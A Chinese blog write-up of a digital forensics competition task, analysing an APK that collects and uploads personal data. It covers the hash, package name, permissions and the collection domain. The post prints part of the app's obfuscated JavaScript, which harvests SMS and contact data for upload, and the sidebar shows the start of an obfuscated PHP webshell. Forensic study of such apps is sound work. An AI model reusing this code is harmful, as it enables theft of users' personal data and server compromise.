第三届长安杯检材一复盘

于 2022-09-06 10:56:49 发布
阅读量1k 收藏 1
点赞数
文章标签: 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_56037764/article/details/126720678
版权

分享到:  

第一题

题目

请计算检材一Apk的SHA256值

Writeup

使用windows自带的计算工具get-filehash

  1. 进入文件所在目录

  2. 输入

    Get-FileHash .\检材一-zhibo.apk -Algorithm SHA256

  3. 得到hash值:3FECE1E93BE4F422C8446B77B6863EB6A39F19D8FA71FF0250AAC10F8BDDE73A

 

正在上传…重新上传取消

第二题

题目

该APK的应用包名为

Writeup

直接使用GDA查看plus.H5B8E45D3

正在上传…重新上传取消

第三题题目

该APK程序在封装服务商的应用唯一标识(APPID)为

Writeup

唯一标识appid 是对apk的打包工具的记录 可以去调取注册打包工具人的详细信息

可以使用雷电APP智能分析,直接得到

也可以了用jadx工具分析得到,位于assets/data/dcloud_control.xml中

正在上传…重新上传取消

第四题

题目

该APK具备下列哪些危险权限(多选题):

A.读取短信

B.读取通讯录

C.读取精确位置

D.修改通讯录

E.修改短信

Writeup

解法1

使用雷电APP智能分析得到危险权限

正在上传…重新上传取消

解法2

相关资料:Android常用的网络权限,Android常用的权限大全_张赫尔的博客-CSDN博客

使用GDA baseinfo查找到相关权限

正在上传…重新上传取消

[Permissions]

android.permission.INTERNET

android.permission.WRITE_EXTERNAL_STORAGE

android.permission.ACCESS_NETWORK_STATE

android.permission.ACCESS_WIFI_STATE

android.permission.INSTALL_PACKAGES

android.permission.REQUEST_INSTALL_PACKAGES

android.permission.ACCESS_COARSE_LOCATION

android.permission.ACCESS_FINE_LOCATION

android.permission.READ_CONTACTS

android.permission.READ_SMS

android.permission.RECEIVE_SMS

android.permission.SEND_SMS

android.permission.WRITE_SMS

android.permission.GET_ACCOUNTS

android.permission.WRITE_CONTACTS

android.permission.CHANGE_WIFI_STATE

android.permission.READ_PHONE_STATE

android.permission.MOUNT_UNMOUNT_FILESYSTEMS

android.permission.READ_LOGS

android.permission.WRITE_SETTINGS

android.permission.READ_EXTERNAL_STORAGE

再根据这些权限和上面的相关资料匹配,得到答案是全选

第五题

题目

该APK发送回后台服务器的数据包含一下哪些内容(多选题):

A.手机通讯录

B.手机应用列表

C.手机号码

D.验证码

E.GPS定位信息

Writeup

抓包分析的话可能受模拟器影响,会少一个GPS,因此我们使用代码分析的方法来看。见第七题分析提取出代码后。

正在上传…重新上传取消

正在上传…重新上传取消

正在上传…重新上传取消

这三段发包的代码我们可以看到传输了的参数包括duanxin(短信)、jingweidu(经纬度)、con(var con = sjh + "" + yqm + '' + address; //sjh(手机号)、yqm(邀请码))。但是目前没有看到通讯录的数据传输,只看到了通讯录权限的要求。到目前为止暂时没有看到代码里有通讯录。不过在抓包的时候确实抓到了。

第六题

题目

该APK程序回传通讯录时,使用的http请求方式为()

Writeup

抓包分析即可,POST

正在上传…重新上传取消

第七题

题目

该APK程序的回传地址域名为【标准格式:www.abc.com

Writeup

这里要的是域名,并不是详细网址

所以是www.honglian7001.com

第八题

题目

该APK程序代码中配置的变量apiserver的值为(后面不带/)

Writeup

分析逆向代码中的资源,发现应用由网站打包痕迹严重,怀疑是网站打包服务APP结果。

正在上传…重新上传取消

发现了Sojson v4加密,尝试解密

正在上传…重新上传取消image.png

解密地址:Sojson v4 解密 - Bugku CTF

源代码:

['sojson.v4']["\x66\x69\x6c\x74\x65\x72"]["\x63\x6f\x6e\x73\x74\x72\x75\x63\x74\x6f\x72"](((['sojson.v4']+[])["\x63\x6f\x6e\x73\x74\x72\x75\x63\x74\x6f\x72"]['\x66\x72\x6f\x6d\x43\x68\x61\x72\x43\x6f\x64\x65']['\x61\x70\x70\x6c\x79'](null,"47Q42H10P32U42h80F114e111m103n99t101s115H115E101X100k32J66j121m32M74F83H68O101y99P32r105l110z32I48M46g48p48j115q10Y32O42w74W83B68L101c99h32J45P32p74z83k68C101o99t46W106l115z46t111o114A103B10I32g42N47D10B109M117z105Z46P105F110d105q116S40n41r59o10h10O9l9K109L117g105R46B112Q108x117t115x82q101L97s100c121W40j102o117d110F99N116r105N111B110P32x40M41t32j123t10Y9Z9x9M47L47e118E97C114a32Z109t97C105J110p32a61q32n112t108C117F115k46J97c110n100v114T111G105L100c46F114X117o110p116N105d109u101I77V97M105f110z65y99F116N105Q118D105H116B121g40A41G59K32C32W10w9q9j9P47j47R32g109O97Y105d110k46l109X111e118n101Y84P97K115K107a84R111i66o97n99P107d40J102I97C108G115i101v41E59E10i10y9g9i9z118Z97R114U32C97A100j100B114U101e115j115p32n61o32Q112E108X117C115W46Q100j101l118Y105J99p101w46j118o101X110o100Z111e114k32y43E32f39z45q39G32g43A32K112Y108T117T115N46M100D101p118K105Q99S101D46m109V111v100T101E108M59J10N9m9U9n97y100M100C114D101K115h115Z32Y61Z32d97N100o100K114I101H115W115A46h114A101u112P108V97t99D101d40i47m92q110b47a103T44d32L34M34A41C46z114R101N112s108V97P99V101n40g47w32T47D103d44z32i34g34Y41O46w114W101F112y108a97r99r101K40v47v92U114A47Y103g44X32U34s34l41v59R10U9P9a9W118N97H114P32N97f112K105P115O101X114H118n101A114a32w61p32G39C104A116M116s112w58u47K47j119R119Q119m46c104U111e110a103a108x105t97B110x55O48L48s49p46D99D111b109n47j97a112L105D47h117S112f108I111B97p100H115e47k39J59g10u9v9D9P47P47B37325v22797A25968i25454a22788A29702j32q39044y38450X29992Q25143G37325l22797P28857y20987Y10L9u9C9g118g97K114l32w100u97r110Z106J105c115c104i105x106i105d97x110c32T61b32p116U114X117E101F59C10P9G9a9w102o117I110h99e116l105t111Z110U32I114k101P113R117p101e115A116u80Z101M114Z109p105G115l115c105i111k110m40b115u106D104V44q32K121Q113r109n41J32r123D10t9W9z9z9Y112E108k117U115C46U97I110t100G114v111Y105m100d46y114Z101O113S117S101X115n116k80s101o114Y109F105o115w115Y105h111h110D115W40B10N9H9u9t9n9L91B34w97V110k100t114K111v105Z100m46y112B101v114O109n105r115F115P105X111U110b46P82Y69Q65n68S95T83I77b83M34c93H44R10d9j9O9M9p9p102i117C110A99z116H105U111d110S32l40y114d101g115M117W108H116G79a98o106e41v32V123U10g9k9n9o9Y9F9D47r47w83I109p115k73s110d102c111S23384k25918Q19968C26465h30701R20449E30340V21508V39033s20869R23481z10s9Z9L9u9P9b9d118K97f114A32X83Q109V115S73C110y102v111D32M61K32b123z125u10c9T9y9m9I9f9S47Y47t83T109X115o23384z25918X25152r26377o30701m20449s10Q9L9C9x9F9E9V118S97d114M32s83a109M115g32R61E32Y123t125B10P10b9N9T9N9s9H9h118D97N114G32X97z105u109x101B105Z32f61p32n115t106z104x59k10a9l9h9a9A9U9a118y97N114P32a97M105m109m101K105Z50r32o61Z32H121j113F109b59Y10c9f9c9E9y9L9E118z97b114p32P100J117B97h110L120g105K110K32P61F32k39K91m123R34W105g109J101b105K34I58y34c39L32N43Q32C97x105a109t101L105u32e43H32E39K34P44H34X105D109B101Y105V50N34h58X34J39i32c43I32S97M105f109A101r105B50E32m43L32x39H34l125R39g59p10I9r9r9e9S9Z9k118P97R114Z32G67p117n114e115r111x114c32n61p32g112d108F117D115m46Y97d110n100w114p111f105h100c46r105l109S112t111f114t116n67F108F97c115g115g40m34X97z110K100U114I111N105a100f46S100X97Z116Y97Z98Z97T115B101Z46E67e117q114r115h111G114u34x41d10x9H9E9H9b9h9M118J97o114y32B85x114T105U32u61B32l112Y108Z117X115k46t97q110J100L114B111h105c100T46K105G109H112c111W114e116b67U108j97v115T115n40k34c97M110z100k114s111B105e100T46l110V101Q116B46k85u114D105s34O41P32E160F32v47q47Q27880w24847v21862A65292L97a110C100s114X111e105P100O46a110m101o116Q46G85C114s105T20013R30340v110P101G116j26159Z23567H20889T10M9Y9E9r9U9w9b118D97r114d32Y97F99m116A105Y118J105m116Y121Z32R61A32g112A108D117m115D46y97Z110J100i114E111y105D100l46M114F117t110U116J105l109y101b77l97W105I110L65f99H116g105I118z105t116e121c40N41t10F9b9J9S9w9k9t118R97k114j32F117J114Y105D32K61X32A85f114r105l46J112A97j114S115S101R40n34y99b111M110a116F101j110j116c58R47N47n115o109e115Z47O34f41z59X10i10w9t9U9Q9a9j9d118p97o114W32N112V114l111O106A101j99V116S105E111X110I32q61X32g110P101L119L32C65W114N114i97J121X40n34h95N105Z100l34w44H32n34l97V100Q100Q114i101l115x115Q34X44Q32u34j112N101R114x115R111q110n34I44L32i34g98Y111p100r121N34H44U32C34x100g97s116X101u34W44A32l34w116T121p112A101g34E41p10y9q9Z9j9H9N9n118H97p114S32r99S117M115l111t114N32e61q32T97E99z116y105l118p105q116S121m46L109j97v110e97V103F101F100L81W117k101Y114c121Q40l117e114s105N44P32l112G114t111F106e101f99Z116B105T111k110V44c32c110h117I108e108R44c32y110r117M108m108Q44M32B34E100w97v116G101p32i100K101i115i99i34x41e10s9l9n9A9s9c9k118g97F114X32f105M100J67d111t108H117a109g110r32W61W32z99r117b115j111m114w46u103d101y116p67O111f108C117I109Z110R73F110U100m101I120D40J34A95N105M100R34s41b10M9x9l9k9X9D9B118e97g114A32w110Z97Y109Z101i67L111l108A117j109y110X32r61w32O99x117s115e111D114x46d103n101U116L67l111H108M117j109S110B73w110i100M101o120B40G34X112n101c114p115K111t110C34U41C10m9G9L9C9G9M9h118F97Q114j32o112N104a111F110e101Y78v117t109d98x101a114H67T111l108m117c109w110h32F61x32b99E117E115m111W114H46c103h101u116s67k111B108W117F109W110W73n110C100x101y120K40B34H97H100f100R114d101l115p115R34E41B10j9x9o9V9q9a9P118y97u114C32r115Y109O115j98Z111p100G121v67B111C108i117u109e110i32B61A32m99w117v115Q111m114O46d103Y101o116w67a111g108R117p109b110k73o110I100n101m120c40w34B98q111C100R121J34h41z10d9a9s9s9R9H9z118h97S114V32m100I97b116a101Y67e111T108l117s109n110i32c61H32Q99V117P115a111O114f46u103q101E116Z67i111i108a117X109P110c73a110a100D101a120e40g34U100B97Q116v101p34S41U10N9t9W9q9H9F9W118b97X114F32m116N121M112Y101s67Z111f108P117A109L110U32S61E32Z99v117B115F111l114o46R103C101I116V67O111a108v117W109v110o73d110W100X101p120R40L34f116K121R112j101g34Y41u10Y9a9K9b9P9d9Y105O102N32e40d99f117R115r111c114M32t33K61u32g110C117w108r108z41T32d123h10w9u9o9l9N9O9H9I119w104F105f108K101H32N40Q99Z117G115M111t114u46x109V111H118p101f84S111r78o101U120j116w40P41I41U32u123e10a9F9H9P9u9t9k9S9S83K109B115x73A110r102d111e46f105b100n32u61x32b99s117V115s111T114C46I103G101U116b83e116o114A105R110a103z40n105H100K67t111y108Y117F109R110X41B10s9F9j9s9n9f9i9G9l83z109S115F73T110u102d111Q46b78F97W109J101k32T61d32e99L117j115A111V114a46k103W101p116n73k110H116o40j110J97G109E101w67y111y108D117z109V110W41W10f9W9S9s9o9x9x9I9H83x109L115X73N110S102Y111z46R68k97Z116s101h32L61M32I99T117T115p111D114d46m103x101K116u76P111J110S103e40l100o97N116e101l67B111m108Q117W109B110P41b10F9p9Z9W9v9q9Q9n9q83N109I115p73F110j102f111y46U68b97q116A101U32U61a32d103R101I116U70c111H114U109Q97A116s68h97f116C101z40f83O109d115v73l110Y102v111w46M68I97m116I101B41V10V9S9B9I9l9h9w9T9N83l109I115Y73X110i102q111L46Y80r104V111R110O101D78N117k109f98q101X114p32R61T32Q99m117S115z111B114w46A103Z101U116r83N116y114G105g110D103g40R112r104P111U110t101W78Y117T109G98s101v114e67d111C108b117G109d110R41c10y9v9a9n9S9V9H9C9y83I109x115l73Q110G102i111e46O83R109y115G98m111V100s121F32Q61T32Q99D117J115j111r114H46S103j101e116b83R116S114G105L110K103Z40y115L109G115g98X111f100M121E67t111z108d117e109K110e41T10j9S9U9E9e9x9f9M9c83v109j115L73d110k102h111H46z84l121s112U101j32Y61f32G99I

最低0.47元/天 解锁文章
枂唁請栀℃704
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
signature=f62f1ec47a85918a7d111dd1dcc3aa4e,ant-design-pro-vue
weixin_42518480的博客
05-30 9万+
# THIS IS AN AUTOGENERATED FILE. DO NOT EDIT THIS FILE DIRECTLY.# yarn lockfile v1"@ant-design/icons-vue@^1.0.1":version "1.0.1"resolved "https://registry.yarnpkg.com/@ant-design/icons-vue/-/icons-vue...
第三届长安杯赛后总结.docx
11-14
电子数据取证
2021年长安杯电子数据取证比赛复盘完整版(wp)
flyable的博客
08-29 1万+
2021年长安杯电子数据取证比赛复盘完整版(wp)
网络管理命令操作
weixin_34409822的博客
06-25 1034
网络管理 本章内容Ø 基本网络配置Ø route命令Ø ip命令Ø netstat/ss命令Ø bonding配置Ø Centos7网络配置工具(nmcli命令)Ø 网络组1、基本网络配置 将Linux主机接入到网络,需要配置网络相关设置。 一般包括如下内容: 主机名...
TCP Ports list (3498 ports in list)
zyb378747350的专栏
01-11 41万+
参考地址:https://www.gasmi.net/tcp.php TCP Ports list (3498 ports in list) 1 tcpmux TCP Port Service Multiplexer 2 compressnet Management Utility 3 compressnet Compression Process
www
yzlhp16的专栏
06-03 319
www
2020长安杯电子取证复盘.rar
11-21
《2020长安杯电子取证复盘》 在当今数字化时代,电子取证已经成为刑事侦查、法律诉讼中不可或缺的一部分。2020年的长安杯电子取证大赛,无疑是这一领域的一次重要活动,它集中展示了我国电子取证技术的发展水平和...
CAcup.html2021年长安杯复盘
10-26
CAcup.html2021年长安杯复盘
CAcup.md复盘长安杯电子取证大赛
10-25
2021年长安杯电子取证大赛第一部分,第二部分复盘
第三届卫生健康行业网络安全技能大赛 复盘培训
最新发布
08-22
网络安全是一个非常重要的领域,为了提高卫生健康行业的网络安全水平,第三届卫生健康行业网络安全技能大赛复盘培训便应运而生。该培训旨在培养和选拔更多具备实景防御等综合能力的守护型人才。 INTRODUCTION 在这...
cnm.zip_CNM_matlab CNM_workera98_www.2014cnm_zip
07-14
matlab Clauset–Newman–Moore algorithm
开发技术分享
06-18 6万+
感谢大神,原帖链接http://bbs.pediy.com/showthread.php?t=182393 -------以下是转贴内容----- 看雪论坛视频篇  1、Win32Asm与RadAsm开发教程 链接: http://pan.baidu.com/s/1pJlW8T9 密码: pd94 2、浴血凤凰DNF辅助系列教材 链接: http://pan.baidu.com
Android中selector的使用(二)之自定义Button
Arrosunh的专栏
02-02 286
转载:https://www.jianshu.com/p/02f8774de6f2(原文自定义Button)在Android开发中,按钮是最经常使用的控件,按钮所涉及的样式无非几种边框圆角按下的颜色现在有一个按钮的需求如下: 1.背景颜色: 正常: #ff0000 按下: #0088882.文字颜色:正常: #ffffff 按下: #0000003.圆角:弧度为5dp4.边框:宽度:2px
欢迎访问我们的网站 http://www.sw51.com
sw51com的专栏
08-19 11万+
 欢迎访问我们的网站 http://www.sw51.com
http://www.htsjpt.com/admin.php,webshell/php/xiao.php.txt at f875e7b78085777b8a10c3456478dbd192d851a...
热门推荐
weixin_39980575的博客
03-13 61万+
eval(gzuncompress(base64_decode("eJzsvfl3G8eROP6z/J7/h9GYK4AmiIP3IVDiTUq8RJA6qceHY0BABDDQAOAhW/u/MNpNvLJ2I0qkLoq6SJsUZVEUSUmOnnP4WCeO1slGzsd2rDjvW9XHTA8wACnFye7nky9tkUAf1dXV1dXV1dXViqap2rCmJFUtHU2M2Ku...
linux nginx 503,GitLab网页500/502/503错误–Nginx无法启动问题排查
weixin_39610422的博客
05-15 454
让小汤装个GitLab,折腾了一周了还没弄好,网站一直是50x错误,看了下情况是nginx服务挂了。这里记录一下排查的步骤。首先看看gitlab服务的情况:gitlab-ctl status。。。。run: logrotate: (pid 19388) 838s; run: log: (pid 1746) 2102sfinish: mailroom: (pid 30439) 5s; run: lo...
Tesseract OCR Tutorial
凌风探梅的专栏
04-22 2931
from: https://www.raywenderlich.com/93276/implementing-tesseract-ocr-ios Tesseract OCR Tutorial  Lyndsey Scott on February 13, 2015 Code your way into his/her he
web
sunlionjun的博客
10-17 3万+
Bookmarks Bookmarks Bookmarks bar eclipse plugins Index of /jbosstools/updates/requirements/m2eclipse/20110728-1500 email track ...
学习前端第一个阶段html项目的复盘回顾目标
07-02
### 回答1: 学习前端的第一个阶段是学习HTML,而复盘回顾则是对所学知识的总结和反思。那么,学习HTML的复盘回顾目标可以包括以下几个方面。 首先,复盘回顾的目标是巩固和加深对HTML的理解。在学习HTML的过程中,我们通过了解HTML的语法规则、标签和属性等,掌握了如何创建网页的结构和内容。通过复盘回顾,可以巩固这些知识点,提高对HTML的理解和应用能力。 其次,复盘回顾的目标是发现和纠正自己在学习HTML过程中存在的问题和不足之处。可能在学习HTML的过程中,我们遇到了某些困难,或者对某些知识点理解不够透彻,或者在实践中出现了一些错误。通过复盘回顾,可以仔细检查自己的学习过程,找出问题所在,从而有针对性地进行纠正和改进。 另外,复盘回顾的目标是提升自己的实践能力。学习HTML不仅是理论知识的学习,更重要的是能够将所学知识应用到实际项目中。通过复盘回顾,可以回顾自己在实践中的表现,发现自己在实践中的不足之处,并通过实践的经验不断提升自己的实践能力。 最后,复盘回顾的目标还可以包括对学习HTML的感悟和未来的规划。通过复盘回顾,可以总结自己在学习HTML过程中的体会和收获,为以后的学习和发展做好规划。同时,也可以思考并规划下一个阶段的学习目标和计划,为之后的学习打下坚实的基础。 ### 回答2: 学习前端第一个阶段的HTML项目的复盘回顾目标主要包括以下几个方面。 首先,目标是回顾并巩固HTML的基本知识和技能。在这个阶段,我学习了HTML的基本标签、元素和属性的用法,以及如何创建网页的结构和布局。通过实际项目的练习,我巩固了这些知识,提高了对HTML的熟练程度。 其次,目标是学会使用常用的HTML标签和元素来构建网页内容。在项目中,我学习了如何使用标题、段落、链接、图片、表格等标签和元素来创建丰富多样的网页内容。我学会了使用这些标签和元素实现文本、图片和表格的显示和排版,同时也学会了如何添加链接和导航等功能。 另外,目标是了解并掌握HTML的语义化。在项目中,我学习了如何正确选择和使用HTML标签和元素,以达到更好的语义化效果。我了解到使用适当的标签能够提高网页的可读性和可访问性,对搜索引擎优化也有一定的帮助。 最后,目标是培养自我实践和解决问题的能力。在项目中,我遇到了一些技术问题和困难,但通过查找文档、搜索和尝试,我成功地解决了这些问题。这个过程提高了我自主学习和解决问题的能力,也为接下来的学习和项目打下了坚实的基础。 总的来说,学习前端第一个阶段的HTML项目的复盘回顾目标是回顾并巩固HTML的基本知识和技能,学会使用常用的HTML标签和元素,了解并掌握HTML的语义化,以及培养自我实践和解决问题的能力。通过这个项目的学习,我对HTML有了更深的理解和掌握,为接下来的学习打下了坚实的基础。 ### 回答3: 学习前端的第一个阶段,主要是学习HTML的基础知识和技能。在完成第一个HTML项目后,进行复盘回顾是为了总结学习经验并确定进一步的目标。 首先,复盘回顾的目标是回顾项目的整体结构和设计,并评估自己对HTML基础知识的掌握程度。通过回顾项目,可以了解自己在项目中的表现,发现并改正可能存在的问题,并提升项目的整体质量。同时,回顾还可以帮助我们深入了解HTML的各种标签和属性的使用方法,以及它们之间的关系和作用。 其次,复盘回顾的目标是梳理学习过程中遇到的困难和问题。学习HTML的过程中,可能会遇到一些难以理解或掌握的概念和技术,或者在项目中遇到了一些难以解决的问题。通过回顾这些困难和问题,可以找到学习的瓶颈和不足之处,然后有针对性地进行学习和提升。 最后,复盘回顾的目标是制定下一阶段学习的目标和计划。通过回顾项目,我们可以更好地了解自己在前端学习的过程中的进步和不足,并且确定下一个阶段需要学习和提升的重点。在制定学习目标和计划时,我们可以考虑自己的兴趣和职业发展方向,并选择相应的学习资源和实践项目。 总而言之,学习前端的第一个阶段完成一个HTML项目后,进行复盘回顾的目标是总结、评估和改进学习过程和成果,并制定下一阶段的学习目标和计划。通过不断的回顾和提升,我们可以逐渐成为一名优秀的前端开发者。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值